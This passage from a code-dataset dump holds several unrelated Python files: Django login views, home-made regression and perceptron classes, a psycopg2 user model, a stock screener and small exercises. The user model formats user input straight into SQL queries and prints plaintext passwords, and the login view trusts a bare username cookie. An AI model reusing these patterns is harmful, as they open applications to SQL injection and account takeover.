d0.to_csv('data/airport_weather.gz',compression='gzip',header=True)\n","sub_path":"util/get_weather_data.py","file_name":"get_weather_data.py","file_ext":"py","file_size_in_byte":15271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"56449470","text":"# -*- encoding:utf-8 -*-\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import auth\nfrom HippoWeb.forms import LoginForm\nimport rsa\nimport json\n\n\ndef page_not_found(request, **kwargs):\n from django.shortcuts import render_to_response\n response = render_to_response('404.html')\n response.status_code = 404\n return response\n\n\ndef server_error(request, **kwargs):\n from django.shortcuts import render_to_response\n response = render_to_response('50x.html')\n response.status_code = 500\n return response\n\n\ndef rsa_encrypt(req):\n \"\"\"使用RSA生成公钥私钥,并拆分存放private key\"\"\"\n (public, private) = rsa.newkeys(512)\n private_key = dict()\n private_key['n'] = private.n\n private_key['e'] = private.e\n private_key['d'] = private.d\n private_key['p'] = private.p\n private_key['q'] = private.q\n req.session['privkey'] = private_key # session存放在 django_session表内\n pub_e = hex(public.e).split('0x')[1] # hex转化为16进制数再截去0x头部\n pub_n = hex(public.n).split('0x')[1]\n # print(pub_e)\n # print(pub_n)\n pubkey = {'pub_e': pub_e, 'pub_n': pub_n}\n return pubkey\n\n\ndef rsa_privkey(req):\n \"\"\"从session中提取private key\"\"\"\n priv = req.session.get('privkey')\n privkey = rsa.PrivateKey(priv['n'],\n priv['e'],\n priv['d'],\n priv['p'],\n priv['q'])\n return privkey\n\n\ndef login(req):\n \"\"\"返回登录页表单\"\"\"\n login_user = req.COOKIES.get('username')\n if login_user:\n return redirect('/index/')\n pubkey = rsa_encrypt(req)\n pub_e = pubkey['pub_e']\n pub_n = pubkey['pub_n']\n login_form = LoginForm()\n return render(req, 'login.html', {'login_form': login_form, 'pub_e': pub_e, 'pub_n': pub_n})\n\n\ndef checklogin(req):\n \"\"\"检验登录数据\"\"\"\n if req.is_ajax():\n if req.method == 'POST':\n username = req.POST.get('username', None)\n en_password = req.POST.get('en_password', None)\n if en_password:\n # RSA加密暂时搁置先不实现, MMP\n password = req.POST.get('password', None)\n # privkey = rsa_privkey(req)\n # py2使用en_password.decode('hex')\n # password = rsa.decrypt(bytes.fromhex(en_password), privkey)\n # req.session['privkey'] = None\n user = auth.authenticate(username=username, password=password)\n if user:\n auth.login(req, user)\n response = HttpResponse(json.dumps({'data': \"ok\"}))\n response.set_cookie('username', user)\n return response\n else:\n response = HttpResponse(json.dumps({'data': \"error\"}))\n return response\n # 添加账号密码判断反馈回前端\n\n\ndef logout(req):\n \"\"\"注销已登录用户\"\"\"\n login_user = req.COOKIES.get('username')\n if login_user:\n response = redirect('/login/')\n response.delete_cookie('username')\n auth.logout(req)\n return response\n else:\n return redirect('/login/')\n\n\n@login_required\ndef index(req):\n try:\n \"\"\"主页,判断用户是否已经登录,若未登录则跳转login页\"\"\"\n login_user = req.COOKIES.get('username')\n if login_user:\n return render(req, 'index.html')\n else:\n return redirect('/login/')\n except Exception as error:\n print(error)\n","sub_path":"HippoWeb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"486213675","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator\nfrom sklearn.metrics import r2_score, accuracy_score\nfrom sklearn.datasets import load_boston, load_breast_cancer, load_digits, load_wine\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression as sklearn_LogisticRegression\nimport copy\n\nclass LinearRegression(BaseEstimator):\n def __init__(self, fit_intercept=True):\n super().__init__()\n self.fit_intercept = fit_intercept\n\n def init_params(self, X, Y):\n self.X = X.copy()\n self.Y = Y.copy()\n\n def add_ones(self, X):\n if self.fit_intercept:\n ones = np.ones((X.shape[0], 1))\n return np.hstack((ones, X))\n return X\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n tmp_X = self.add_ones(X)\n\n tmp_X = np.mat(tmp_X)\n tmp_Y = np.mat(self.Y).T\n\n XTX = tmp_X.T * tmp_X\n if np.linalg.det(XTX) == 0:\n raise ZeroDivisionError\n\n self.W = XTX.I * tmp_X.T * tmp_Y\n if self.fit_intercept:\n self.coef_ = np.ravel(self.W)[1:]\n self.intercept_ = np.ravel(self.W)[0]\n else:\n self.coef_ = self.W\n return self\n\n def predict(self, X):\n tmp_X = self.add_ones(X)\n tmp_X = np.mat(tmp_X)\n Y_pred = tmp_X * self.W\n return np.ravel(Y_pred)\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return r2_score(Y, Y_pred)\n\nclass Ridge(BaseEstimator):\n def __init__(self,\n learning_rate = 0.01, max_iter = 500, tol = 1e-4,\n solver = 'Batch', fit_intercept = True, alpha = 1\n ):\n super().__init__()\n self.learning_rate = learning_rate\n self.max_iter = max_iter\n self.tol = tol\n self.solver = solver\n self.fit_intercept = fit_intercept\n self.alpha = alpha\n\n def init_params(self, X, Y):\n self.X = X.copy()\n self.Y = Y.copy()\n self.std = StandardScaler().fit(self.X)\n self.X = self.std.transform(self.X)\n self.W = np.mat(np.zeros((self.X.shape[1] + 1, 1)))\n self.GD_dict = {'Batch' : self._cal_grad_Batch,\n 'Stocastic' : self._cal_grad_Stocastic,\n 'Mini' : self._cal_grad_Mini}\n\n def add_ones(self, X):\n if self.fit_intercept:\n ones = np.ones((X.shape[0], 1))\n return np.hstack((ones, X))\n return X\n\n def _cal_grad_Batch(self, X, Y):\n return 2 / X.shape[0] * (X.T * (X * self.W - Y) + self.alpha * self.W)\n\n def _cal_grad_Stocastic(self, X, Y):\n j = np.random.choice(range(X.shape[0]), 1)\n X_j, Y_j = X[j], Y[j]\n return 2 / X.shape[0] * (X_j.T * (X_j * self.W - Y_j) + self.alpha * self.W)\n\n def _cal_grad_Mini(self, X, Y):\n j = np.random.choice(range(X.shape[0]), 32)\n X_j, Y_j = X[j], Y[j]\n return 2 / X.shape[0] * (X_j.T * (X_j * self.W - Y_j) + self.alpha * self.W)\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n tmp_X = np.mat(self.add_ones(self.X))\n tmp_Y = np.mat(self.Y).T\n steps = 0\n\n while steps < self.max_iter:\n steps += 1\n gd = self.GD_dict[self.solver](tmp_X, tmp_Y)\n if gd.T * gd < self.tol:\n break\n self.W -= self.learning_rate * gd\n\n if self.fit_intercept:\n self.coef_ = np.ravel(self.W)[1:]\n self.intercept_ = np.ravel(self.W)[0]\n else:\n self.coef_ = self.W\n return self\n\n def predict(self, X):\n X = self.std.transform(X)\n tmp_X = self.add_ones(X)\n tmp_X = np.mat(tmp_X)\n Y_pred = tmp_X * self.W\n return np.ravel(Y_pred)\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return r2_score(Y, Y_pred)\n\nclass _LogisticRegression(BaseEstimator):\n def __init__(self,\n tol = 1e-4, C = 1, fit_intercept = True, max_iter = 5000,\n learning_rate = 0.1, solver = 'sag'\n ):\n super().__init__()\n self.tol = tol\n self.C = 1/C\n self.fit_intercept = fit_intercept\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n self.solver = solver\n\n def init_params(self, X, Y):\n self.X = X.copy()\n self.Y = Y.copy()\n self.std = StandardScaler().fit(self.X)\n self.X = self.std.transform(self.X)\n if self.fit_intercept:\n self.W = np.mat(np.zeros((self.X.shape[1] + 1, 1)))\n else:\n self.W = np.mat(np.zeros((self.X.shape[1], 1)))\n self.delta_dict = {'sag' : self.SAG,\n 'newton' : self.Newton}\n\n def add_ones(self, X):\n if self.fit_intercept:\n ones = np.ones((X.shape[0], 1))\n return np.hstack((ones, X))\n return X\n\n def sigmod(self, X, w):\n z = X * w\n return 1/(1 + np.exp(-z))\n\n def cal_sigmoid_error(self, X, Y):\n sigmod_result = self.sigmod(X, self.W)\n error = sigmod_result - Y\n return error, sigmod_result\n\n def SAG(self, X, Y):\n if self.solver == 'sag':\n j = np.random.choice(range(X.shape[0]), 32)\n X_j, Y_j = X[j], Y[j]\n else:\n X_j, Y_j = X, Y\n error, sigmod_result = self.cal_sigmoid_error(X_j, Y_j)\n gd = 1/X.shape[0] * (X_j.T * error + self.C * self.W)\n if self.solver == 'sag':\n return gd\n elif self.solver == 'newton':\n return gd, sigmod_result\n\n def Hessian(self, X, sigmod_result):\n sigmod_result = np.ravel(sigmod_result)\n B = np.diag(sigmod_result)\n return 1/X.shape[0] * X.T * B * X + self.C * np.eye(X.shape[1])\n\n def Newton(self, X, Y):\n gd, sigmod_result = self.SAG(X, Y)\n H = self.Hessian(X, sigmod_result)\n return H.I * gd\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n tmp_X = np.mat(self.add_ones(self.X))\n tmp_Y = np.mat(self.Y).T\n steps = 0\n\n while steps < self.max_iter:\n steps += 1\n delta = self.delta_dict[self.solver](tmp_X, tmp_Y)\n while delta.T * delta < self.tol:\n break\n if self.solver == 'sag':\n self.W -= self.learning_rate * delta\n elif self.solver == 'newton':\n self.W -= delta\n\n if self.fit_intercept:\n self.coef_ = np.ravel(self.W)[1:]\n self.intercept_ = np.ravel(self.W)[0]\n else:\n self.coef_ = self.W\n self.iterations = steps\n return self\n\n def predict_proba(self, X):\n X = self.std.transform(X)\n tmp_X = np.mat(self.add_ones(X))\n Y_proba_1 = self.sigmod(tmp_X, self.W)\n Y_proba_0 = 1 - Y_proba_1\n Y_proba = np.hstack((Y_proba_0, Y_proba_1))\n return Y_proba\n\n def predict(self, X):\n Y_pred_proba = self.predict_proba(X)\n return Y_pred_proba.argmax(axis = 1)\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return accuracy_score(Y, Y_pred)\n\n\nclass LogisticRegression(BaseEstimator):\n def __init__(self,\n tol = 1e-4, C = 1, fit_intercept = True, max_iter = 5000,\n learning_rate = 0.1, solver = 'sag'\n ):\n super().__init__()\n self.tol = tol\n self.C = 1/C\n self.fit_intercept = fit_intercept\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n self.solver = solver\n self.binary = True\n\n\n def init_params(self, X, Y):\n if len(np.unique(Y)) > 2:\n self.binary = False\n if len(Y.shape) == 1:\n self.onehot = OneHotEncoder(sparse = False).fit(Y.reshape(-1, 1))\n self.Y_ = self.onehot.transform(Y.reshape(-1, 1))\n\n estimator_params = (\"tol\", \"C\", \"fit_intercept\",\n \"max_iter\", \"learning_rate\",\n \"solver\")\n self.base_estimator_ = _LogisticRegression(**{p: getattr(self, p) for p in estimator_params})\n\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n if self.binary:\n return self.base_estimator_.fit(X, Y)\n self.base_model_list = [copy.deepcopy(self.base_estimator_.fit(X, Y_class)) for Y_class in self.Y_.T]\n return self\n\n def predict_proba(self, X):\n Y_pred_proba = np.array(np.hstack([model.predict_proba(X)[:, -1].reshape(-1,1) for model in self.base_model_list]))\n row_sum = Y_pred_proba.sum(axis = 1).reshape(-1,1)\n return Y_pred_proba/row_sum\n\n def predict(self, X):\n Y_pred_proba = self.predict_proba(X)\n return Y_pred_proba.argmax(axis = 1)\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return accuracy_score(Y, Y_pred)\n\nclass _Perceptron(BaseEstimator):\n def __init__(self, gaussian_kernel=True,\n normalize = True,\n max_iter = 500,\n gamma = 1e-2,\n predict_probability=True,\n Log_model = 'sklearn'\n ):\n super().__init__()\n self.gaussian_kernel = gaussian_kernel\n self.normalize = normalize\n self.max_iter = max_iter\n self.gamma = gamma\n self.predict_probability = predict_probability\n self.Log_model = Log_model\n\n def init_params(self, X, Y):\n self.N, self.M = X.shape\n self.X = X.copy()\n self.Y = Y.copy()\n self.Y[self.Y == 0] = -1\n\n if self.normalize:\n self.stand = StandardScaler().fit(self.X)\n self.X = self.stand.transform(self.X)\n\n self.a = np.zeros(self.N)\n self.Gram_matrix = self.Kernel(self.X, self.X)\n\n\n def _gaussian_dot(self, X_i, X_j):\n return np.exp(-self.gamma * ((X_i - X_j) ** 2).sum())\n\n def Kernel(self, X1, X2):\n N = X1.shape[0]\n M = X2.shape[0]\n if self.gaussian_kernel:\n Gram_matrix = np.zeros((N, M))\n for i in range(N):\n X_i = X1[i, :]\n for j in range(M):\n X_j = X2[j, :]\n Gram_matrix[i, j] = self._gaussian_dot(X_i, X_j)\n else:\n Gram_matrix = X1 @ X2.T\n return Gram_matrix\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n steps = 0\n while steps < self.max_iter:\n steps += 1\n missing_index = -1\n for j in range(self.X.shape[0]):\n checking = self.Y[j] * ((self.a * self.Y * self.Gram_matrix[j, :]).sum() + self.a @ self.Y)\n if checking <= 0:\n missing_index = j\n break\n if missing_index == -1:\n break\n self.a[missing_index] += 1\n\n if self.predict_probability:\n X_log = self.decision_function(self.X).reshape(-1, 1)\n self.std = StandardScaler().fit(X_log)\n X_log = self.std.transform(X_log)\n if self.Log_model == 'sklearn':\n self.logistic_model = sklearn_LogisticRegression(solver='lbfgs').fit(X_log, self.Y)\n elif self.Log_model == 'fakesklearn':\n self.logistic_model = LogisticRegression(solver='newton').fit(X_log, self.Y)\n self.steps = steps\n return self\n\n def _predict_dis(self, col):\n return (self.a * self.Y * col).sum() + self.a @ self.Y\n\n def decision_function(self, X):\n pred_Gram_matrix = pd.DataFrame(self.Kernel(self.X, X))\n X_log = pred_Gram_matrix.apply(self._predict_dis, axis=0).values\n return X_log\n\n def predict_proba(self, X):\n if self.normalize:\n X = self.stand.transform(X)\n X_log = self.decision_function(X).reshape(-1, 1)\n X_log = self.std.transform(X_log)\n return self.logistic_model.predict_proba(X_log)\n\n def predict(self, X):\n if self.predict_probability:\n Y_pred_proba = self.predict_proba(X)\n return Y_pred_proba.argmax(axis = 1)\n\n Y_pred = np.sign(self.decision_function(X))\n Y_pred[Y_pred == -1] = 0\n return Y_pred\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return accuracy_score(Y, Y_pred)\n\nclass Perceptron(BaseEstimator):\n def __init__(self,\n gaussian_kernel=True,\n normalize=True,\n max_iter=500,\n gamma=1e-2,\n predict_probability=True,\n Log_model='sklearn'\n ):\n super().__init__()\n self.gaussian_kernel = gaussian_kernel\n self.normalize = normalize\n self.max_iter = max_iter\n self.gamma = gamma\n self.predict_probability = predict_probability\n self.Log_model = Log_model\n self.binary = True\n\n def init_params(self, X, Y):\n if len(np.unique(Y)) > 2:\n self.predict_probability = True\n self.binary = False\n if len(Y.shape) == 1:\n self.onehot = OneHotEncoder(sparse = False).fit(Y.reshape(-1, 1))\n self.Y_ = self.onehot.transform(Y.reshape(-1, 1))\n\n estimator_params = (\"gaussian_kernel\", \"normalize\", \"max_iter\",\n \"gamma\", \"predict_probability\",\n \"Log_model\")\n self.base_estimator_ = _Perceptron(**{p: getattr(self, p) for p in estimator_params})\n\n def fit(self, X, Y):\n self.init_params(X, Y)\n if self.binary:\n return self.base_estimator_.fit(X, Y)\n self.base_model_list = [copy.deepcopy(self.base_estimator_.fit(X, Y_class)) for Y_class in self.Y_.T]\n return self\n\n def predict_proba(self, X):\n Y_pred_proba = np.array(np.hstack([model.predict_proba(X)[:, -1].reshape(-1,1) for model in self.base_model_list]))\n row_sum = Y_pred_proba.sum(axis = 1).reshape(-1,1)\n return Y_pred_proba/row_sum\n\n def predict(self, X):\n Y_pred_proba = self.predict_proba(X)\n return Y_pred_proba.argmax(axis = 1)\n\n\n def score(self, X, Y):\n Y_pred = self.predict(X)\n return accuracy_score(Y, Y_pred)\n\n\nif __name__ == '__main__':\n boston = load_boston()\n X = boston['data']\n Y = boston['target']\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(X, Y, test_size=0.3, random_state = 43)\n\n LR = LinearRegression().fit(Xtrain, Ytrain)\n print(LR.score(Xtrain, Ytrain), LR.score(Xtest, Ytest))\n\n ridge = Ridge(max_iter = 5000, solver = 'Mini', learning_rate = 0.1, alpha = 0.5).fit(Xtrain, Ytrain)\n print(ridge.score(Xtrain, Ytrain), ridge.score(Xtest, Ytest))\n\n # bc = load_breast_cancer()\n # bc = load_digits(n_class=2)\n bc = load_wine()\n X = bc['data']\n Y = bc['target']\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(X, Y, test_size=0.3, random_state=42)\n\n LogR = LogisticRegression().fit(Xtrain, Ytrain)\n print(LogR.score(Xtrain, Ytrain), LogR.score(Xtest, Ytest))\n\n Perp = Perceptron(gaussian_kernel = True).fit(Xtrain, Ytrain)\n print(Perp.score(Xtrain, Ytrain), Perp.score(Xtest, Ytest))\n\n\n print('done')","sub_path":".history/fakesklearn/linear_model_20201202210159.py","file_name":"linear_model_20201202210159.py","file_ext":"py","file_size_in_byte":15246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492836766","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 4 08:30:49 2021\r\n\r\n@author: hp\r\n\"\"\"\r\nimport os\r\nimport psycopg2\r\n\r\nclass UserModel():\r\n TABLE_NAME = 'user_dtls'\r\n DATABASE_URL = os.environ['DATABASE_URL'] \r\n \r\n def __init__(self, _id, nameu, email, pwd, admin):\r\n print('DATABASE_URL:',self.DATABASE_URL)\r\n self.id = _id\r\n self.nameu = nameu\r\n self.email = email\r\n self.pwd = pwd\r\n self.admin = admin\r\n \r\n def json(self):\r\n return {\"id\": self.id, \r\n \"nameu\": self.nameu,\r\n \"email\": self.email,\r\n \"pwd\": self.pwd,\r\n \"admin\": self.admin\r\n }\r\n \r\n @classmethod\r\n def get_by_email(cls, email): \r\n connection = psycopg2.connect(cls.DATABASE_URL) \r\n cursor = connection.cursor()\r\n query = \"SELECT id, nameu, email, pwd, admin FROM {0} WHERE email='{1}'\".format(cls.TABLE_NAME,email)\r\n print(\"\\nquery @UserModel @get_by_email:\",query)\r\n cursor.execute(query)\r\n \r\n row = cursor.fetchone()\r\n if row:\r\n print(row)\r\n user = cls(*row)\r\n else:\r\n print(\"no results fetched\")\r\n user = None\r\n\r\n connection.close()\r\n return user\r\n @classmethod\r\n def get_by_id(cls, _id): \r\n connection = psycopg2.connect(cls.DATABASE_URL) \r\n \r\n cursor = connection.cursor()\r\n query = \"SELECT id, nameu, email, pwd, admin FROM {0} WHERE id='{1}'\".format(cls.TABLE_NAME,_id)\r\n #print(\"\\nquery @UserModel @get_by_id:\",query)\r\n cursor.execute(query)\r\n \r\n row = cursor.fetchone()\r\n if row:\r\n print(row)\r\n user = cls(*row)\r\n else:\r\n print(\"no results fetched\")\r\n user = None\r\n\r\n connection.close()\r\n return user\r\n @classmethod\r\n def get_list(cls):\r\n \r\n print('DATABASE_URL:',cls.DATABASE_URL) \r\n connection = psycopg2.connect(cls.DATABASE_URL) \r\n \r\n cursor = connection.cursor()\r\n query = \"SELECT id, nameu, email, pwd, admin FROM {0}\".format(cls.TABLE_NAME)\r\n print(\"\\nquery @UserModel @get_list:\",query)\r\n cursor.execute(query)\r\n \r\n rows = cursor.fetchall()\r\n ul=[]\r\n for row in rows:\r\n #print(row)\r\n user = cls(*row)\r\n ul.append(user)\r\n print(user.json())\r\n connection.close()\r\n return ul\r\n def save_to_db(self): \r\n connection = psycopg2.connect(self.DATABASE_URL) \r\n \r\n cursor = connection.cursor()\r\n query = \"INSERT INTO {0}(nameu, email, pwd, admin) VALUES ('{1}','{2}','{3}','{4}')\".format(self.TABLE_NAME, self.nameu, self.email, self.pwd, self.admin)\r\n print(\"\\nquery @UserModel @save_to_db:\",query)\r\n cursor.execute(query)\r\n connection.commit()\r\n\r\n connection.close()\r\n return True\r\n ","sub_path":"Models/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"591100611","text":"\n# 예를 들어, 좌표가 (12, 5)인 점 A는 x좌표와 y좌표가 모두 양수이므로 제1사분면에 속한다. 점 B는 x좌표가 음수이고 y좌표가 양수이므로 제2사분면에 속한다.\n# 점의 좌표를 입력받아 그 점이 어느 사분면에 속하는지 알아내는 프로그램을 작성하시오. 단, x좌표와 y좌표는 모두 양수나 음수라고 가정한다.\n\nx = int(input())\ny = int(input())\n\nif x > 0:\n if y > 0:\n print(1)\n else:\n print(4)\nelse:\n if y > 0:\n print(2)\n else:\n print(3)\n","sub_path":"BaekJoon/if/if_4.py","file_name":"if_4.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389986640","text":"from keys import ameritrade\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport requests, time, re, pickle\nimport pandas\nimport os\n\nfiles_data = []\n\ndef writeStockData():\n url = \"https://api.tdameritrade.com/v1/instruments\"\n\n stock_list = pandas.read_csv('company_lists.csv', usecols=['Symbol']).values.tolist()\n\n start = 0\n end = 500\n\n while start < len(stock_list):\n if len(stock_list) < end:\n symbols = stock_list[start:len(stock_list)]\n else:\n symbols = stock_list[start:end]\n \n payload = {'apikey': ameritrade[\"Consumer Key\"],\n 'symbol': symbols,\n 'projection': 'fundamental'}\n\n results = requests.get(url, params=payload)\n\n data = results.json()\n file_name = str(time.asctime()) + '.pkl'\n file_name = re.sub('[ :]', '_', file_name)\n\n files_data.append(file_name)\n\n with open(file_name, 'wb') as file:\n pickle.dump(data, file)\n start = end\n end += 500\n time.sleep(1)\n\n\ndef readStockDataFromFile():\n data = []\n\n for file in files_data:\n with open(file, 'rb') as f:\n info = pickle.load(f)\n stocks_keys = list(info)\n\n # Points of interest for stocks\n points = ['symbol', 'netProfitMarginMRQ', 'peRatio', 'pegRatio', 'high52', 'dividendAmount']\n for stock in stocks_keys:\n stock_data = []\n for point in points:\n stock_data.append(info[stock]['fundamental'][point])\n data.append(stock_data)\n os.remove(file)\n return data\n\n\ndef createScreneerTable():\n data = readStockDataFromFile()\n\n # New columns for data to be displayed\n columns = ['Symbol', 'Margin', 'PE', 'PEG', 'high52', 'Dividend']\n file_results = pandas.DataFrame(data, columns=columns)\n \n fig = go.Figure(data=[go.Table(\n header=dict(\n values=columns,\n line_color='paleturquoise',\n align='center'\n ),\n cells=dict(\n values=[\n file_results.Symbol,\n file_results.Margin,\n file_results.PE,\n file_results.PEG,\n file_results.high52,\n file_results.Dividend]\n ))\n ])\n\n fig.show()\n\nif __name__ == '__main__':\n writeStockData()\n createScreneerTable()","sub_path":"stock-screener.py","file_name":"stock-screener.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"469875179","text":"#!/usr/bin/env python\n\ndef parse_sh_ip_int_br():\n import re\n with open('sh_ip_int_br.txt') as cfg:\n file = cfg.readlines()\n rslt = []\n for l in file:\n r = re.search(r'(\\S+) +(\\S+) .*(u\\S+|d\\S+) .*(u\\S+|d\\S+)', l)\n if r:\n rslt.append(r.groups())\n return rslt\n\n\nif __name__ == '__main__':\n print(parse_sh_ip_int_br())\n","sub_path":"15_module_re/answ_15_2_parse_sh_ip_int_br.py","file_name":"answ_15_2_parse_sh_ip_int_br.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"187801614","text":"'''\r\ndatabase with sqlite 3\r\n-------------------------\r\n\r\n'''\r\n\r\nimport sqlite3 \r\nfrom datetime import datetime\r\n\r\n\r\nclass Database:\r\n def __init__(self) -> None:\r\n self.conn=sqlite3.connect('Library.sqlite3')\r\n self.cur=self.conn.cursor()\r\n self.cur.execute(\"CREATE TABLE IF NOT EXISTS tblbook(id INTEGER PRIMARY KEY, title VARCHAR(50),author VARCHAR(50), year INTEGER,pdate DATE )\")\r\n self.conn.commit()\r\n\r\n def adddata (self):\r\n print('Add your record: ')\r\n print('='*40)\r\n t1=input('Title: ')\r\n a1=input('Author: ')\r\n y1=input('Year : ')\r\n\r\n self.cur.execute(\"INSERT INTO tblbook(title,author,year,pdate) VALUES(?,?,?,?)\",(t1,a1,y1,datetime.today()))\r\n self.conn.commit()\r\n\r\n\r\n def showdata(self):\r\n self.cur.execute('SELECT * FROM tblbook')\r\n print(\"\\n\\n%-5s %-20s %-15s %-10s %-10s \"%('ID','TITLE','AUTHOR','YEAR','PDATE'))\r\n print('='*80)\r\n for data in self.cur.fetchall() :\r\n print(\"%-5s %-20s %-15s %-10s %-10s \"%(data[0],data[1],data[2],data[3],data[4]))\r\n\r\n \r\ndb= Database()\r\ndb.adddata() \r\ndb.showdata()","sub_path":"day16/lesson16_database.py","file_name":"lesson16_database.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"612320456","text":"import pandas as pd\r\nimport os\r\n\r\ncwd = os.getcwd()\r\nprint('Current working directory: '+cwd)\r\n\r\n#---walking thru the current working directory---#\r\n\r\n#---root = cwd, dir = sub dirs in cwd, files = files in cwd---#\r\nfor root,dirs,files in os.walk(cwd):\r\n for file in files:\r\n if file.endswith('.csv'):\r\n #---extract data\r\n filenames_df = pd.read_csv(file, header = None)\r\n \r\n#print (filenames_df)\r\nFileNames = filenames_df[0] \r\n \r\n#---get the name of the files after sorting by the date modified---#\r\nFiles = os.listdir(cwd)\r\nfull_list = [os.path.join(cwd,i) for i in Files] #this method is called List comprehension\r\ntime_sorted_list = sorted(full_list, key=os.path.getmtime)\r\n\r\n#---remove the path from elements and extract only name of the files in the cwd---\r\nsorted_filename_list = [ os.path.basename(i) for i in time_sorted_list]\r\n\r\ni = 0 #list index\r\ntopicNo = 1 #topicNos\r\nFileNo = 0 #renaming index\r\n\r\nfor file in sorted_filename_list:\r\n\r\n #---check for filenames with no extension---#\r\n SplitExt = os.path.splitext(file)\r\n if SplitExt[1] == '':\r\n \r\n source = cwd + '\\\\' + file\r\n\r\n #---check for the topic files and create txt files---#\r\n TopicCheck = str(topicNo) + '. '\r\n if FileNames[i].find(TopicCheck) != -1:\r\n #print (FileNames[i])\r\n FileNames[i].replace(TopicCheck,'')\r\n \r\n #---create the txt file---#\r\n f = open('0' + str(FileNo) +'. ' + FileNames[i]+'.txt','w')\r\n f.close\r\n \r\n topicNo = topicNo + 1\r\n i=i+1\r\n \r\n destination = cwd + '\\\\' + str(FileNo) + '.' + FileNames[i] + '.mp4'\r\n os.rename(source,destination) #rename it finally!\r\n \r\n FileNo = FileNo+1\r\n i=i+1\r\n\r\n","sub_path":"Rename course files/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"83194065","text":"# -- encoding:utf-8 --\n\"\"\"\n@File : 02_案例代码:基于决策树算法的鸢尾花分类\n@Author: Octal_H\n@Date : 2019/10/13\n@Desc : \n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\nfrom sklearn.preprocessing import LabelEncoder\n\nmpl.rcParams['font.sans-serif'] = [u'simHei']\n\nnp.random.seed(0)\n\n# 1. 加载数据(数据一般存在于磁盘或者数据库)\npath = '../datas/iris.data'\nnames = ['A', 'B', 'C', 'D', 'cla']\ndf = pd.read_csv(path, header=None, names=names)\n\n\n# 2. 数据清洗\n\n\n# # 3. 根据需求获取最原始的特征属性矩阵X和目标属性Y\nX = df[names[0:-1]]\nY = df[names[-1]]\nprint(Y)\nlabel_encoder = LabelEncoder()\nlabel_encoder.fit(Y)\nY = label_encoder.transform(Y)\n# 这里得到的序号其实就是classes_这个集合中对应数据的下标\n# print(label_encoder.classes_)\n# true_label = label_encoder.inverse_transform([0, 1, 2, 0])\n# print(true_label)\n# print(Y)\n\n\n# 4. 数据分割\n# train_size: 给定划分之后的训练数据的占比是多少,默认0.75\n# random_state:给定在数据划分过程中,使用到的随机数种子,默认为None,使用当前的时间戳;给定非None的值,可以保证多次运行的结果是一致的。\nx_train, x_test, y_train, y_test = train_test_split(X, Y, train_size=0.8, random_state=28)\nprint(\"训练数据X的格式:{}, 以及类型:{}\".format(x_train.shape, type(x_train)))\nprint(\"测试数据X的格式:{}\".format(x_test.shape))\nprint(\"训练数据Y的类型:{}\".format(type(y_train)))\n\n\n# 5. 特征工程的操作\n# NOTE: 不做特征工程\n\n\n# 6. 模型对象的构建\n\"\"\"\ncriterion=\"gini\", -> 指定在计算最优划分特征的时候,特征属性的纯度衡���指标,可选值:gini和entropy\nsplitter=\"best\", -> 指定在选择特征属性的时候的划分方式,可选值:best和random\nmax_depth=None, -> 剪枝参数,构建完成的决策树允许最大的深度为多少,None表示不限制\nmin_samples_split=2, -> 剪枝参数,表示在构建决策树的时候,如果当前数据集中的样本数目小于该值,那么对于当前数据集不进行划分。\nmin_samples_leaf=1, -> 剪枝参数,指定在叶子节点中只要要求具有多少样本,可选值类型:int和float,int表示数量,float表示占比\nmax_features=None, -> 在寻找最优划分的时候,从多少个特征属性中找最优划分,默认为None,表示在所有特征属性中选择最优划分\nrandom_state=None, -> 随机数种子\nmax_leaf_nodes=None, -> 剪枝参数:最优允许的叶子节点数目,默认为None,表示不限制\n\"\"\"\nalgo = DecisionTreeClassifier(criterion='gini')\n\n\n# 7. 模型的训练\nalgo.fit(x_train, y_train)\n\n\n# 8. 模型效果评估\ntrain_predict = algo.predict(x_train)\ntest_predict = algo.predict(x_test)\nprint(\"测试集上的效果(准确率):{}\".format(algo.score(x_test, 